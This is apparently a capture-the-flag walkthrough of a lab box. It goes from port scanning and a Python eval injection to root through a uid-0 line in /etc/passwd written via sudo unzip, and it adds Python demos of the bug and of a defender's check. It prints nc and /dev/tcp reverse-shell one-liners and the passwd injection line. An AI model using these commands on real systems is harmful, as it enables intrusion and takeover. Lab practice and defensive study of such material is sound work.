Scanning the box with nmap -A -T4 -p- 192.168.1.18 -vv:

Connecting to port 56563 with telnet:

The service asks for a number, but there is a trick to it: whatever we type is evaluated as Python, so we can send a command instead of a number:
__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444>/tmp/f')
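
The bug behind that trick, as an added example that is not code from the box or from this write-up: a "guess the number" prompt that hands the raw input to eval() (what Python 2's input() did implicitly) accepts a call expression as a perfectly valid "number". The service name, prompt and the harmless payload are assumptions; the payload keeps the shape used above but calls os.getpid() instead of spawning a reverse shell so the file is safe to run.

```python
"""Vulnerable number prompt (eval on user input) next to a parser that
only accepts integers. Added example; not the target's source code."""

# Same shape as the write-up's payload, pointed at a harmless call (assumption).
HARMLESS_PAYLOAD = "__import__('os').getpid()"


def guess_vulnerable(raw):
    """Mimics the target: Python 2 input() / Python 3 eval(input()).
    Anything the client sends is executed as a Python expression."""
    return eval(raw)  # deliberately unsafe, this is the bug being shown


def parse_guess_safe(raw):
    """Accept only an optionally signed decimal integer, else raise ValueError.

    int() never evaluates code, so "__import__('os').system(...)" is rejected
    before anything runs. ast.literal_eval would also refuse a call, but it
    still accepts lists, dicts and huge literals, so int() is the tighter gate."""
    text = raw.strip()
    if not text.lstrip("+-").isdigit():
        raise ValueError("not an integer: %r" % raw)
    return int(text)


def is_integer_guess(raw):
    """True if the hardened parser would accept this input."""
    try:
        parse_guess_safe(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for sample in ["42", "6*7", HARMLESS_PAYLOAD]:
        print("%-28s safe=%-5s vulnerable=%r"
              % (sample, is_integer_guess(sample), guess_vulnerable(sample)))
```

Run it and compare the two columns: the hardened parser accepts only "42", while the vulnerable path happily evaluates "6*7" and executes the call in the payload, which is exactly why a reverse-shell one-liner works where a number was expected.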

And on our listening port we get a shell:

We upgrade the shell to a proper TTY with python3 -c 'import pty;pty.spawn("/bin/bash")' and then view the file bla2-note:

The password czNjcjN0 is base64, which decodes to s3cr3t. Now let's view the /etc/group file:

The password didn't work for bla or ck04, but we still have the SSH service, so let's take a look at it:

The password didn't work there either, but this might: cat /etc/*-release gave us:

It shows CODENAME=bionic, and the banner said "Enumerate Hostname and Distro's codename of this box And try to get Secure Shell", so we use bionic as the password:

OK, that's weird: we got the user flag but were kicked out right away, so let's try running bash -p instead:

Yes, it worked, but we got stuck because no command displayed any output, so we spawn another reverse shell with bash -i >& /dev/tcp/192.168.1.11/1234 0>&1:

Now we see that user ck04 has sudo privileges:

And the user bla has sudo privileges too:

OK, now we are going to add a new user with root privileges to /etc/passwd:

We copy /etc/passwd to bla's home directory, edit the copy and append this line:
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now we use the unzip command that sudo -l showed us: first we zip the edited copy, then unzip it over the original /etc/passwd:

Now we su hacker; the password is 123456.
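
The zip-then-unzip overwrite above, rehearsed as an added example inside a throwaway directory so nothing on the real system is touched (this is not code from the write-up). Assumptions: the sample passwd contents are constructed; the hacker line is the one quoted above, a $1$ MD5-crypt hash with salt "hacker" (if the password really is 123456, openssl passwd -1 -salt hacker 123456 reproduces it); the temporary directory stands in for "/", and the extraction step mirrors sudo unzip -o pwn.zip -d /, where -o overwrites existing files and -d sets the destination. The uid0_accounts() function is the check a defender would run on the box afterwards.

```python
"""Rehearsal of the sudo-unzip /etc/passwd overwrite, plus a uid-0 audit.
Added example; paths are relative to a temporary fake root."""
import os
import tempfile
import zipfile

# Constructed sample, not copied from the target.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "bla:x:1000:1000:bla:/home/bla:/bin/bash\n"
    "ck04:x:1001:1001:ck04:/home/ck04:/bin/bash\n"
)
# Line quoted in the write-up: uid 0, gid 0, MD5-crypt hash with salt "hacker".
HACKER_LINE = "hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash\n"


def build_payload_zip(fake_root, edited_passwd_text):
    """Stage the edited copy under home/bla/etc/passwd and zip it so the
    archive entry is 'etc/passwd' (cp /etc/passwd etc/; zip -r pwn.zip etc)."""
    staging = os.path.join(fake_root, "home", "bla")
    os.makedirs(os.path.join(staging, "etc"), exist_ok=True)
    staged_file = os.path.join(staging, "etc", "passwd")
    with open(staged_file, "w") as f:
        f.write(edited_passwd_text)
    zip_path = os.path.join(staging, "pwn.zip")
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.write(staged_file, arcname="etc/passwd")
    return zip_path


def sudo_unzip_overwrite(zip_path, fake_root):
    """Equivalent of 'sudo unzip -o pwn.zip -d /' (flags are an assumption):
    entries are extracted relative to the destination, replacing what is there."""
    with zipfile.ZipFile(zip_path) as zf:
        zf.extractall(fake_root)  # etc/passwd lands on <fake_root>/etc/passwd


def uid0_accounts(passwd_text):
    """Defender's check: names of every account whose uid field is 0."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names


def run_demo():
    """Create a fake /etc/passwd, overwrite it through the zip, return uid-0 users."""
    with tempfile.TemporaryDirectory() as fake_root:
        etc = os.path.join(fake_root, "etc")
        os.makedirs(etc)
        with open(os.path.join(etc, "passwd"), "w") as f:
            f.write(SAMPLE_PASSWD)
        zip_path = build_payload_zip(fake_root, SAMPLE_PASSWD + HACKER_LINE)
        sudo_unzip_overwrite(zip_path, fake_root)
        with open(os.path.join(etc, "passwd")) as f:
            return uid0_accounts(f.read())


if __name__ == "__main__":
    print(run_demo())  # ['root', 'hacker']
```

The point the rehearsal makes is that unzip with sudo rights is a write-anywhere primitive: the archive path decides the destination file, and -o removes the only thing standing between the attacker and /etc/passwd. On a box like this, a passwd file with more than one uid-0 entry is the first thing to look for after the fact.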
